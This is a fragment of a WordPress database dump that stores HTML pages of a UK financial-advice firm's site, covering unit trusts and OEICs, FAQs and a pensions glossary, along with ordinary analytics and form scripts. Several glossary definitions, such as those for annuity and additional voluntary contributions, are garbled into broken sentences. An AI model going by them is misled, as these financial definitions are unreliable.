management fee of between 0.5% and 1.5%. It is possible to reduce these charges by investing through a discount broker or fund supermarket, but this means acting without financial advice.</p>&#13;\n<p>Charges on OEICs are pretty transparent. Any initial charge is shown as a separate item on your transaction statement – so the whole transaction is clear and easy to understand.</p>&#13;\n			</div>&#13;\n					</div>&#13;\n			</div>&#13;\n	<div id=\"sidebar\" style=\"float:right;\">&#13;\n		<ul class=\"side-nav\"><li><a href=\"/investments\" title=\"Back to Parent Page\">Investments</a></li>&#13;\n						<li class=\"page_item page-item-119\"><a href=\"isas\">ISAs</a></li>&#13;\n<li class=\"page_item page-item-116\"><a href=\"lump-sum-investment\">Lump Sum Investment</a></li>&#13;\n<li class=\"page_item page-item-100\"><a href=\"offshore-bonds\">Offshore Bonds</a></li>&#13;\n<li class=\"page_item page-item-122 current_page_item\"><a href=\"unit-trusts-oeics\">Unit Trusts &amp; OEICs</a></li>&#13;\n					</ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"/seven-deadly-investment-sins\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/mortgage-strategic-alliance\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/esmart-money-januaryfebruary-2014-issue\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/how-much-money-can-i-get-pension\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/what-does-a-wealth-managerdo\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"/portfolio-items/smart-money-nov-dec\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/critical-illness-guide\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/guide-auto-enrolment\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main-min.js\"/></body>','Unit Trusts &amp; OEICs','Unsure what is the best UK Unit trusts and OEICs are. we provide a clear, transparent financial roadmap and unit trust saving strategy that delivers...','publish','closed','closed','','unit-trusts-oeics','','','2017-09-21 16:34:42','2017-09-21 16:34:42','',0,'http://www.equalitywalk.org.uk/unit-trusts-oeics',0,'page','',0),(113,1,'2017-09-21 16:34:42','2017-09-21 16:34:42','<body bgcolor=\"#ffffff\" onload=\"MM_preloadImages(\'images/investments_r4_c1_f2.jpg\',\'images/investments_r4_c6_f2.jpg\',\'images/investments_r4_c9_f2.jpg\',\'images/investments_r4_c11_f2.jpg\',\'images/investments_r4_c12_f2.jpg\',\'images/investments_r4_c15_f2.jpg\',\'images/investments_r4_c16_f2.jpg\')\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n<div style=\"position:absolute; top:0px; left:50%; margin-left:-475px\">&#13;\n<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"950\"><tr><td><img src=\"../images/spacer.gif\" width=\"10\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"18\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"14\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"29\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"49\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"78\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"16\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"30\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"109\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"44\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"109\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"118\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"11\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"29\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"138\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"129\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"19\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\" valign=\"top\" class=\"header\" style=\"background-image:url(../images/index_r1_c1.jpg); background-repeat:no-repeat\"><a href=\"../wealth-management-faqs/\">wealth management FAQs</a> -  <a href=\"../wealth-management-glossary/\">glossary of wealth management terms</a> - <a href=\"../additional/financial-calendar/\">financial calendar</a></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"38\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\"> </td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"27\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"9\"><a href=\"/\"><img name=\"investments_r3_c1\" src=\"../images/investments_r3_c1.jpg\" width=\"353\" height=\"96\" border=\"0\" id=\"investments_r3_c1\" alt=\"Wealth Management Home Page\" /></a></td>&#13;\n   <td colspan=\"8\" valign=\"top\"><div style=\"font-size:19px; text-align:right; margin-right:30px\">Offices throughout the UK,<br />&#13;\n     call us for expert financial advice - &#13;\n     <span style=\"color:#600\"><span class=\"adinsightNumber1901\"></span></span>&#13;\n<script type=\"text/javascript\" src=\"../jsapi.js\"></script><script type=\"text/javascript\"><![CDATA[\r\n  google.load(\'search\', \'1\');\r\n  google.setOnLoadCallback(function() {\r\n    google.search.CustomSearchControl.attachAutoCompletion(\r\n      \'011057125409238421392:utfk3c-gm7e\',\r\n      document.getElementById(\'q\'),\r\n      \'cse-search-box\');\r\n  });\r\n]]></script><form action=\"../search-results/\" id=\"cse-search-box\">&#13;\n  <div>&#13;\n    <input type=\"hidden\" name=\"cx\" value=\"011057125409238421392:utfk3c-gm7e\" /><input type=\"hidden\" name=\"cof\" value=\"FORID:9\" /><input type=\"hidden\" name=\"ie\" value=\"UTF-8\" /><input type=\"text\" name=\"q\" id=\"q\" autocomplete=\"on\" size=\"21\" /><input type=\"submit\" name=\"sa\" value=\"Search our Site\" /></div>&#13;\n&#13;\n<script type=\"text/javascript\" src=\"../cse/brand_form_cse-search-box_amp_lang_en_amp_sitesearch_true.js\"></script></form></div></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"96\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"5\"><a href=\"/\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c1\',\'\',\'images/investments_r4_c1_f2.jpg\',1)\"><img name=\"investments_r4_c1\" src=\"../images/investments_r4_c1.jpg\" width=\"120\" height=\"50\" border=\"0\" id=\"investments_r4_c1\" alt=\"\" /></a></td>&#13;\n   <td colspan=\"3\"><a href=\"../pension/\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c6\',\'\',\'images/investments_r4_c6_f2.jpg\',1)\"><img name=\"investments_r4_c6\" src=\"../images/investments_r4_c6.jpg\" width=\"124\" height=\"50\" border=\"0\" id=\"investments_r4_c6\" alt=\"Pension Advice\" /></a></td>&#13;\n   <td colspan=\"2\"><a href=\"..\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c9\',\'\',\'images/investments_r4_c9_f2.jpg\',1)\"><img name=\"investments_r4_c9\" src=\"../images/investments_r4_c9.jpg\" width=\"153\" height=\"50\" border=\"0\" id=\"investments_r4_c9\" alt=\"Savings &amp; Investments\" /></a></td>&#13;\n   <td><a href=\"../trusts-protection/\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c11\',\'\',\'images/investments_r4_c11_f2.jpg\',1)\"><img name=\"investments_r4_c11\" src=\"../images/investments_r4_c11.jpg\" width=\"109\" height=\"50\" border=\"0\" id=\"investments_r4_c11\" alt=\"Trusts and Bonds\" /></a></td> <td colspan=\"3\"><a href=\"../wealth-platform/\" onmouseout=\"MM_swapImgRestore()\" onmouseover=\"MM_swapImage(\'index_r4_c11\',\'\',\'images/index_r4_c11_f2.jpg\',1);\"><img name=\"index_r4_c11\" src=\"../images/index_r4_c11.jpg\" width=\"158\" height=\"50\" border=\"0\" id=\"index_r4_c11\" alt=\"Wealth Management\" /></a></td>&#13;\n   <td><a href=\"../about-us/\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c15\',\'\',\'../images/investments_r4_c15.jpg\',1)\"><img name=\"investments_r4_c15\" src=\"../images/investments_r4_c15.jpg\" width=\"138\" height=\"50\" border=\"0\" id=\"investments_r4_c15\" alt=\"About Us\" /></a></td>&#13;\n   <td colspan=\"2\"><a href=\"../contact-us/\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c16\',\'\',\'images/investments_r4_c16_f2.jpg\',1)\"><img name=\"investments_r4_c16\" src=\"../images/investments_r4_c16.jpg\" width=\"148\" height=\"50\" border=\"0\" id=\"investments_r4_c16\" alt=\"Contact Us\" /></a></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"50\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td rowspan=\"9\"><img name=\"investments_r5_c1\" src=\"../images/investments_r5_c1.jpg\" width=\"10\" height=\"545\" border=\"0\" id=\"investments_r5_c1\" alt=\"\" /></td>&#13;\n   <td colspan=\"13\"><div id=\"breadcrumb\"><a href=\"/\">home</a> &gt; glossary of wealth management terms</div>&#13;\n   <h1>Wealth Management FAQs</h1></td>&#13;\n   <td colspan=\"2\" rowspan=\"4\" valign=\"top\"><div class=\"paracontent\">There will be many financial questions you will have about our company and also the service you are interested in?<br /><br />&#13;\nBelow you will find a few commonly asked questions and their answers..</div>  </td>&#13;\n   <td rowspan=\"4\"><img name=\"investments_r5_c17\" src=\"../images/investments_r5_c17.jpg\" width=\"19\" height=\"260\" border=\"0\" id=\"investments_r5_c17\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"63\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"6\"><img name=\"investments_r6_c2\" src=\"../images/investments_r6_c2.jpg\" width=\"204\" height=\"9\" border=\"0\" id=\"investments_r6_c2\" alt=\"\" /></td>&#13;\n   <td rowspan=\"3\" colspan=\"7\"></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"9\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"2\" rowspan=\"7\" valign=\"top\"><img name=\"investments_r7_c2\" src=\"../images/investments_r7_c2.jpg\" width=\"32\" height=\"473\" border=\"0\" id=\"investments_r7_c2\" alt=\"\" /></td>&#13;\n   <td colspan=\"3\" valign=\"top\" class=\"related\" style=\"background-image:url(../images/investments_r7_c4.jpg); background-repeat:no-repeat\">Related Pages</td>&#13;\n   <td rowspan=\"7\" valign=\"top\"><img name=\"investments_r7_c7\" src=\"../images/investments_r7_c7.jpg\" width=\"16\" height=\"473\" border=\"0\" id=\"investments_r7_c7\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"34\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"3\" rowspan=\"5\" valign=\"top\" class=\"relatedlinks\" style=\"background-image:url(../images/investments_r13_c4.jpg); background-position:bottom; background-repeat:no-repeat\"><a href=\"../about-us/\" title=\"About Reid, Scott &amp; Ross\">About Us</a> <br /> &#13;\n     find out more  about Equity SMART&#13;\n<br /><br /><a href=\"../contact-us/\">Contact Us</a>&#13;\n<br /> &#13;\ncomplete our short enquiry form or call us to get financial advice&#13;\n<br /><br /><a href=\"../wealth-management-glossary/\">Glossary of Terms</a> <br /> &#13;\nunsure what some of the financial jargon actually means,  explanations in plain english<br /><br /><a href=\"../wealth-management-faqs/\">Frequently Asked Questions</a> <br /> &#13;\ndo you have  some questions? Read our  FAQs to find out more<br /><br /><a href=\"/\">Testimonials</a> <br />&#13;\nfind out what our clients are saying</td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"154\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"10\" rowspan=\"5\" valign=\"top\"><div class=\"paracontent2\">  &#13;\n     Why Are Financial Advisors Important?&#13;\n&#13;\n     <br />&#13;\n     Financial Advisors are important for many reasons.  Primarily, they help millions of consumers achieve their financial goals.  These goals are as varied as the individuals themselves and many Financial Planners and Financial Advisory firms tailor their services to meet certain segments of this vast and diverse population.&#13;\n&#13;\n     <br /><br />&#13;\n     Individuals might consider managing their own finances but do not have the training, skill sets and experience that financial planners and advisors have. <br /><br />&#13;\nAre we independent?&#13;\n&#13;\n<br />&#13;\nYes we are independent financial advisers with access to whole of market on an agreed remuneration basis be that fee, commission or offset. <br /><br />&#13;\nHow much do I owe you for this initial consultation?&#13;\n&#13;\n<br />&#13;\nNo charge is made for the initial information gathering process. All subsequent recommendations will be subject to an agreed remuneration basis which is detailed in our terms of business. <br /><br />&#13;\nHow much State Pension am I likely to get?&#13;\n&#13;\n<br />&#13;\nYou can request a State Pension forecast from The Pensions Service which will give you an estimate of your Basic State Pension including any graduated pension, SERPs Pension and S2P which you may have accrued throughout your employment history. <br /><br />&#13;\nTogether with this information, we can look at any personal pensions and/or employer’s occupation pensions and help you plan for your retirement.</div></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"71\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td><img src=\"../images/spacer.gif\" width=\"1\" height=\"108\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td><img src=\"../images/spacer.gif\" width=\"1\" height=\"24\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td><img src=\"../images/spacer.gif\" width=\"1\" height=\"58\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"3\" valign=\"top\"> </td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"24\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\"><img name=\"investments_r14_c1\" src=\"../images/investments_r14_c1.jpg\" width=\"950\" height=\"8\" border=\"0\" id=\"investments_r14_c1\" alt=\"\" /></td>&#13;\n    <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"8\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\"><img name=\"investments_r17_c1\" src=\"../images/investments_r17_c1.jpg\" width=\"950\" height=\"6\" border=\"0\" id=\"investments_r17_c1\" alt=\"\" /></td>&#13;\n    <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"6\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\" valign=\"top\" style=\"background-image:url(../images/index_r16_c1.jpg); background-repeat:no-repeat; color:#333;\"><div class=\"footerlinks\"><a href=\"../site-map/\">sitemap</a> - <a href=\"../privacy-policy/\">privacy policy</a> - <a href=\"/\">testimonials</a></div><div class=\"footertext\"><br /></div></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"75\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr></table></div>&#13;\n<script type=\"text/javascript\"><![CDATA[\r\nvar gaJsHost = ((\"https:\" == document.location.protocol) ? \"https://ssl.\" : \"http://www.\");\r\ndocument.write(unescape(\"%3Cscript src=\'\" + gaJsHost + \"google-analytics.com/ga.js\' type=\'text/javascript\'%3E%3C/script%3E\"));\r\n]]></script><script type=\"text/javascript\"><![CDATA[\r\ntry {\r\nvar pageTracker = _gat._getTracker(\"UA-10958181-3\");\r\npageTracker._trackPageview();\r\n} catch(err) {}]]></script><script type=\"text/javascript\"><![CDATA[\r\n   var adiInit =\"488\";\r\n   (function() {\r\n      var adiSrc = document.createElement(\"script\"); adiSrc.type = \"text/javascript\";\r\n      adiSrc.async = true;\r\n      adiSrc.src = (\"https:\" == document.location.protocol ? \"https://\" : \"http://\") + \"static.adinsight.eu/static/scripts/adiTrack.min.js\";\r\n      var s = document.getElementsByTagName(\"script\")[0];\r\n      s.parentNode.insertBefore(adiSrc, s);\r\n   })();\r\n]]></script></body>','Wealth Manangement FAQs - Reid, Scott &amp; Ross','','publish','closed','closed','','wealth-manangement-faqs-reid-scott-ross','','','2017-09-21 16:34:42','2017-09-21 16:34:42','',0,'http://www.equalitywalk.org.uk/wealth-manangement-faqs-reid-scott-ross',0,'page','',0),(114,1,'2017-09-21 16:34:42','2017-09-21 16:34:42','<body class=\"page page-id-318 page-template-default header-full-width header-image content-sidebar\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n<div id=\"wrap\">&#13;\n<div id=\"header\"><div class=\"wrap\"><div id=\"title-area\"><p id=\"title\"><a href=\"http://www.equalitywalk.org.uk/\" title=\"Equity SMART\">Equity SMART Wealth Management</a></p></div><!-- end #title-area --></div><!-- end .wrap --></div><!--end #header--><div id=\"nav\"><div class=\"wrap\"><ul id=\"menu-main-nav\" class=\"menu menu-primary superfish\"><li id=\"menu-item-11\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-11\"><a title=\"Wealth Management home\" href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-27\"><a href=\"../pensions/\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-92\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-92\"><a href=\"../pensions/pension-release/\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"../pensions/stakeholder-pensions/\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\">Auto Enrolment Pensions</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\">Income Drawdown</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-47\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-46\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"../asset-protection/\">Asset Protection</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Schemes</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-45\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-45\"><a href=\"../insurance-protection/\">Insurance Protection</a></li>&#13;\n<li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n<li id=\"menu-item-43\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-43\"><a href=\"../about-us/\">About Us</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-149\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-149\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-407\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-407\"><a href=\"../about-us/frequently-asked-questions/\">Frequently Asked Questions</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-24\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-24\"><a href=\"../contact-us/\">Contact Us</a></li>&#13;\n</ul></div><!-- end .wrap --></div><div id=\"inner\"><div class=\"wrap\">	<div id=\"content-sidebar-wrap\">&#13;\n				<div id=\"content\" class=\"hfeed\">&#13;\n			<div class=\"breadcrumb\">You are here: <a href=\"/\" title=\"View Wealth Management home\">Wealth Management home</a> / Glossary of Wealth Management Terms</div>	<div class=\"post-318 page type-page status-publish hentry\">&#13;\n&#13;\n				<h1 class=\"entry-title\">Glossary of Wealth Management Terms</h1>&#13;\n		&#13;\n				<div class=\"entry-content\">&#13;\n			<p>Certain financial terms often mean different things to different people, depending on their own particular understanding of the matters relating to finance &amp; policies.</p>&#13;\n<p>Financial terms will also have slightly different interpretations in different countries. As a general rule for all people not involved  in the financial industry, if in doubt, ask for an explanation from the person or company responsible for producing the figures and using the terms. You may be the only one to ask, but you certainly will not be the only one wondering what it all means. Don’t be intimidated by financial terminology or confusing figures and methodology. Always ask for clarification, and you will find that most financial advisers are very happy to explain.</p>&#13;\n<p>Below we will give you an ordinary English definition for some terms. As always we are only a phone call away if you need further help.</p>&#13;\n<dl><dt>ACCRUED PENSION</dt>&#13;\n<dd>Quantity of pension credited to some plan member based on service, earnings, etc., up to given date.</dd>&#13;\n<dt>ACTUARY</dt>&#13;\n<dd>an expert within the pension and insurance fields accountable for calculating risks and premiums.</dd>&#13;\n<dt>ADDITIONAL VOLUNTARY CONTRIBUTIONS</dt>&#13;\n<dd>contributions to some plans made voluntarily by a worker along with those contributions necessary to be produced to attain a pension. Extra benefits might be purchased by additional contributions but no additional cost is borne through the employer. Additional voluntary contributions usually are not locked-in by legislation</dd>&#13;\n<dt>ANCILLARY BENEFITS</dt>&#13;\n<dd>benefits along with regular pension benefits and survivor benefits, for example bridging benefits and enriched early retirement benefits.</dd>&#13;\n<dt>ANNUITY</dt>&#13;\n<dd>periodic payments (usually monthly) supplied by the terms of the obtain the duration of a person (the annuitant) or the person and his / her designated beneficiary. An annuity can be a fixed or varying amount, and could keep on being covered an interval following the annuitant’s death.</dd>&#13;\n<dt>ASSET MIX</dt>&#13;\n<dd>describes the proportions of numerous kinds of investments held with a pension fund, usually expressed like a percentage of total investments 